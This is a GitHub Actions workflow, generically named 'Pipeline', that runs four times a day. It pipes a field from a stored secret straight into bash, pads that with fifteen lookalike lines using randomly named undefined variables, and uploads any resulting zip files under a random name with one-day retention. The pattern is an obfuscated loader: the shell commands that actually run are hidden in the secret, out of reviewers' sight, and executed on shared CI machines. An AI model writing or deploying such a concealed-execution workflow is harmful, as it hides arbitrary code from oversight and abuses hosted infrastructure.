name: Pipeline
on:
  workflow_dispatch:

  schedule:
    - cron: '28 4,10,16,22 * * *'
permissions:
  contents: read
  actions: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  execute:
    name: Main task
    runs-on: ubuntu-latest
    steps:
      - name: Checkout
        uses: actions/checkout@v4
      - name: Run
        env:
          lqnx8: ${{ secrets.lqnx8 }}
        run: |
          printf '%s' "$lqnx8" | jq -r .ka71548 | /bin/bash
          printf '%s' "$b36" | jq -r .bpca936 | /bin/bash
          echo $sio5934 | jq -r .r6 | /bin/bash
          echo $ujgn1612 | jq -r .g73373 | /bin/bash
          printf '%s' "$pny446" | jq -r .wu76 | /bin/bash
          printf '%s' "$l090" | jq -r .xnj7007 | /bin/bash
          echo $qfnfb35056 | jq -r .crbc46639 | /bin/bash
          printf '%s' "$odq56770" | jq -r .e52 | /bin/bash
          printf '%s' "$fqrj3" | jq -r .mbmx23 | /bin/bash
          printf '%s' "$rjvj193" | jq -r .symbu11364 | /bin/bash
          echo $cvzwl61 | jq -r .f98324 | /bin/bash
          printf '%s' "$qe07" | jq -r .v52503 | /bin/bash
          printf '%s' "$to3988" | jq -r .ipawg40 | /bin/bash
          echo $xy61160 | jq -r .cjzb223 | /bin/bash
          printf '%s' "$w9" | jq -r .nu724 | /bin/bash
          printf '%s' "$t5" | jq -r .io071 | /bin/bash

      - name: Store results
        uses: actions/upload-artifact@v4
        with:
          name: ZwXWnP4J
          path: "*.zip"
          retention-days: 1
